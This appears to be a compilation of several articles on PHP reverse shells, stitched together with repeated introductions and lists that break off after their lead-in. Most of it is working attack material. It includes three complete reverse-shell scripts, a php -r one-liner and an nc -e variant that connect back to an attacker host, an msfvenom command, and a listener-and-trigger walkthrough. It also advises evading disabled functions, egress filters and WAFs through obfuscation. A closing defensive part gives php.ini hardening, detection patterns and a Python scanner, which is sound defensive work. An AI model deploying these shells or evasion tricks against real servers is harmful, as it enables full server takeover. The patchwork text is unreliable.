This paper examines the mechanisms, execution, and mitigation of PHP-based reverse shells, a critical technique used in penetration testing and cyberattacks to gain interactive command-line access to web servers.
PHP reverse shells are scripts that, when executed on a target server, initiate an outbound connection to an attacker's machine, effectively bypassing traditional firewall restrictions on inbound traffic. This paper details the technical workflow of these shells, provides common payload examples, and explores defensive strategies for system administrators.
1. Introduction to Reverse Shells
A reverse shell (or "connect-back shell") occurs when a compromised system initiates an outbound TCP connection to a listener. Unlike a bind shell, where the attacker connects to an open port on the target, the reverse shell forces the target to reach out to the attacker.
Primary Advantage: It circumvents Network Address Translation (NAT) and firewalls that typically block incoming connections but permit outgoing traffic on common ports like 80 (HTTP) or 443 (HTTPS).
2. Technical Workflow of a PHP Reverse Shell
The execution of a PHP reverse shell generally follows these five steps:
A PHP reverse shell is a common technique used by security professionals to gain remote command-line access to a server after exploiting a vulnerability. By having the target server initiate an outgoing connection to an attacker-controlled listener, it often bypasses inbound firewall restrictions.
Top PHP Reverse Shell Methods
The following are the most widely recognized scripts and one-liners for establishing a PHP reverse shell:
Understanding Reverse Shells in PHP
A reverse shell is a type of shell that allows an attacker to access a victim's computer or server from a remote location. Unlike a traditional shell where the victim connects to the attacker, in a reverse shell, the victim initiates the connection to the attacker. This technique is commonly used in penetration testing and by attackers to bypass network security measures.
Why Use Reverse Shells in PHP?
PHP, being one of the most widely used server-side scripting languages, is often targeted by attackers. A reverse shell in PHP can be particularly useful for attackers to gain access to a server when direct shell access is restricted. For security professionals, understanding how reverse shells work can help in developing better defense mechanisms.
Basic Concept
The basic concept of a reverse shell involves:
PHP Reverse Shell Example
Below is a basic example of a PHP reverse shell. Note: This should only be used for educational purposes or in a controlled environment with permission.
<?php
$ip = 'your_ip_address'; // IP address of the attacker
$port = 1234; // Listening port
// Create a socket
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($sock === false) {
    $error = socket_last_error();
    echo "socket_create() failed: $error\n";
} else {
    // Connect to the attacker's listener
    $result = socket_connect($sock, $ip, $port);
    if ($result === false) {
        $error = socket_last_error($sock);
        echo "socket_connect() failed: $error\n";
        socket_close($sock);
    } else {
        // Make the shell
        $descriptorspec = array(
            0 => array("pipe", "r"), // stdin
            1 => array("pipe", "w"), // stdout
            2 => array("pipe", "w")  // stderr
        );
        $process = proc_open("bash -i", $descriptorspec, $pipes);
        if (is_resource($process)) {
            while (true) {
                $input = socket_read($sock, 1024);
                if ($input) {
                    fwrite($pipes[0], $input);
                }
                $output = fread($pipes[1], 1024);
                socket_write($sock, $output);
                $output = fread($pipes[2], 1024);
                socket_write($sock, $output);
            }
            proc_close($process);
        }
        socket_close($sock);
    }
}
?>
Security Implications
This piece provides a high-level overview of reverse shells in PHP. For detailed technical knowledge, engaging with cybersecurity communities and professional training is recommended.
Reverse Shell in PHP: A Review
A reverse shell is a type of shell that allows an attacker to access a victim's machine from a remote location, often used in penetration testing and malicious activities. In this review, we'll focus on creating a reverse shell using PHP.
What is a Reverse Shell?
A reverse shell is a shell that runs on a victim's machine, connecting back to the attacker's machine, allowing the attacker to execute commands, access files, and perform other malicious activities.
PHP Reverse Shell
To create a reverse shell in PHP, we'll use the following components:
Basic PHP Reverse Shell Code
Here's a basic example of a PHP reverse shell code:
<?php
$host = 'attacker_ip';
$port = 1234;
$sock = fsockopen($host, $port, $errno, $errstr, 30);
if (!$sock) {
    die('Could not connect to ' . $host . ':' . $port);
}
stream_set_blocking($sock, 0);
// proc_open() expects the descriptor spec keyed 0/1/2 (stdin/stdout/stderr)
$descriptorspec = array(
    0 => $sock, // stdin
    1 => $sock, // stdout
    2 => $sock  // stderr
);
proc_open('bash', $descriptorspec, $pipes);
fclose($sock);
?>
How it Works
The script connects to the attacker's host (attacker_ip) on a specified port (1234) using fsockopen.
The stream_set_blocking function is used to set the socket to non-blocking mode.
The proc_open function is used to execute a new process (bash) with the socket as its standard input, output, and error streams.
The fclose function is used to close the socket.
Detection and Prevention
To detect and prevent PHP reverse shells, consider the following:
Top Tools for Detecting and Preventing Reverse Shells
Some top tools for detecting and preventing reverse shells include:
Conclusion
In conclusion, creating a reverse shell in PHP can be a useful tool for penetration testing and legitimate security testing. However, it's essential to use such tools responsibly and with caution. To detect and prevent reverse shells, consider monitoring network traffic, implementing a WAF, keeping software up-to-date, and using secure coding practices.
A PHP Reverse Shell is a piece of code executed on a target server that forces the server to initiate an outgoing connection back to an attacker's machine. This provides the attacker with an interactive command-line interface (shell) on the target system.
In the world of penetration testing and ethical hacking, PHP reverse shells are "top-tier" tools because PHP is the engine behind over 75% of the web. If you can upload or inject code into a web application, a reverse shell is often the final step in gaining full control.
How a PHP Reverse Shell Works
The process relies on a basic "client-server" reversal:
The Listener: The attacker sets up a machine to wait for an incoming connection (usually using a tool like netcat).
The Payload: The attacker uploads a PHP script to the target web server.
The Execution: The attacker triggers the script (e.g., by visiting http://victim.com in a browser).
The Connection: The PHP script executes a system command that connects back to the attacker's listener, handing over control of the shell.
The "Top" PHP Reverse Shell Payloads
Depending on the environment and security restrictions, different payloads are more effective. Here are the most common methods:
1. The Pentestmonkey Classic (The Gold Standard)
The most famous PHP reverse shell was developed by Pentestmonkey. It is a robust, feature-rich script that uses PHP's fsockopen and proc_open functions to create a full duplex connection.
Best for: General-purpose exploitation where you can upload a full file.
Advantage: It handles complex input/output better than simple one-liners.
2. The Interactive One-Liner
If you have a Command Injection vulnerability but can’t upload a full file, a one-liner is essential.
php -r '$sock=fsockopen("ATTACKER_IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
Best for: Fast execution via exec() or system() calls.
How it works: It opens a socket to your IP, then redirects the standard input, output, and error of a shell (/bin/sh) into that socket.
3. Using msfvenom
For professional engagements, the Metasploit Framework's msfvenom tool can generate "top-of-the-line" payloads that are often encoded to bypass basic security filters.
Command: msfvenom -p php/reverse_php LHOST=ATTACKER_IP LPORT=4444 -f raw > shell.php
Advantage: Easily integrated with the Metasploit Meterpreter for advanced post-exploitation.
Step-by-Step Implementation
Step 1: Set up your Listener
On your local machine (or your Kali Linux box), start a listener to catch the incoming connection:
nc -lvnp 4444
(Translation: Listen, Verbose, No DNS resolution, on Port 4444)
Step 2: Prepare the Payload
If using a standard script, you must edit the source code to include your IP address and the port you opened in Step 1.
$ip = '10.10.10.5'; // Your IP
$port = 4444; // Your Port
Step 3: Trigger the Shell
Navigate to the URL where the file is hosted. Your browser will appear to "hang" or "load indefinitely"—this is a good sign! It means the script is currently running and holding the connection open.
Step 4: Interact
Check your terminal. You should see a prompt like $. You are now executing commands as the web server user (usually www-data or apache).
Bypassing Security Restrictions
Modern servers often have defenses that block these "top" shells. Here is how pros get around them:
Disable Functions: Many admins disable exec(), shell_exec(), and system(). Attackers might use passthru() or popen() as alternatives.
Firewalls (Egress Filtering): If the server blocks outgoing connections on common ports like 4444, try connecting back on port 80 or 443 (HTTPS), as these are almost always open for web traffic.
WAF (Web Application Firewall): If a firewall detects "eval" or "base64" in your code, you may need to obfuscate the script by splitting strings or using hex encoding.
Legal and Ethical Warning
Reverse shells are powerful tools used by system administrators for recovery and by security researchers for testing. However, unauthorized access to computer systems is illegal. Always ensure you have explicit, written permission before testing these techniques on any network or server.
In php.ini, modify the disable_functions directive:
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,fsockopen,pfsockopen,stream_socket_client
Note: This breaks legitimate apps (e.g., WordPress updates). Test in staging first.
Using stream_socket_client() with SSL:
$context = stream_context_create(['ssl' => ['verify_peer' => false]]);
$sock = stream_socket_client('ssl://attacker.com:443', $errno, $errstr, 30, STREAM_CLIENT_CONNECT, $context);
Monitor for sh or cmd.exe processes spawned by apache, www-data, or php-fpm.
Create a PHP script that will connect back to your machine. Here is a basic example:
<?php
$ip = 'your_attacker_ip_address'; // Change this to your IP
$port = 4444;
$shell = "nc -e /bin/sh $ip $port";
$descriptorspec = array(
    0 => array("pipe", "r"), // stdin
    1 => array("pipe", "w"), // stdout
    2 => array("pipe", "w")  // stderr
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
    die("Couldn't execute shell");
}
?>
Save this to a file like reverse_shell.php. Make sure to replace your_attacker_ip_address with your actual IP address.
Detect common patterns:
bash -i >& /dev/tcp/
fsockopen( followed by a non-local IP
eval()
Scan for new .php files in web-accessible directories:
find /var/www/html -name "*.php" -mtime -1 -ls
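As an added, defender-side example (not from any of the sources above), the following Python script implements the detection list and the find command together: it walks a web root for recently modified .php files and flags the listed indicators in each file's source. The regexes and the loopback-only definition of "local" are assumptions, and the files it scans are constructed in a temporary directory.

```python
import ipaddress
import re
import tempfile
import time
from pathlib import Path

# Indicator regexes (constructed for this example; not a complete ruleset).
PATTERNS = {
    "dev_tcp_redirect": re.compile(r"bash\s+-i\s+>&\s*/dev/tcp/"),
    "eval_call": re.compile(r"\beval\s*\("),
    "shell_exec_family": re.compile(r"\b(exec|shell_exec|system|passthru|popen|proc_open)\s*\("),
}
# fsockopen()/pfsockopen() with a string-literal host; hosts kept in variables are not resolved.
SOCKOPEN = re.compile(r"""\bp?fsockopen\s*\(\s*(['"])([^'"]+)\1""")

def is_local_host(host: str) -> bool:
    """Only loopback counts as local (assumption), so a lab attacker on 10.x is still flagged."""
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return host.lower() == "localhost"

def scan_source(src: str) -> list:
    """Return the indicator names found in one PHP file's text, in a fixed order."""
    hits = [name for name, rx in PATTERNS.items() if rx.search(src)]
    hits += [f"sockopen_nonlocal:{m.group(2)}" for m in SOCKOPEN.finditer(src)
             if not is_local_host(m.group(2))]
    return hits

def scan_webroot(root: str, max_age_s: int = 86400) -> dict:
    """Python equivalent of `find root -name '*.php' -mtime -1 -ls`, plus the content scan."""
    now = time.time()
    report = {}
    for path in Path(root).rglob("*.php"):
        recent = now - path.stat().st_mtime < max_age_s
        hits = scan_source(path.read_text(errors="replace"))
        if recent or hits:  # new files are reported even without hits: review them by hand
            report[path.relative_to(root).as_posix()] = {"recent": recent, "hits": hits}
    return report

def demo() -> dict:
    """Build a constructed web root (one benign file, one dropped shell) and scan it."""
    root = Path(tempfile.mkdtemp())
    (root / "index.php").write_text('<?php $db = fsockopen("127.0.0.1", 3306); ?>')
    (root / "uploads").mkdir()
    (root / "uploads" / "img.php").write_text(
        '<?php $s = fsockopen("10.10.10.5", 4444); exec("/bin/sh -i <&3 >&3 2>&3"); ?>')
    return scan_webroot(str(root))
```

Run on a real web root, only the "recent" flag and the hit list are output; a hit on a file that predates the age window still deserves a manual look, since the mtime can be forged.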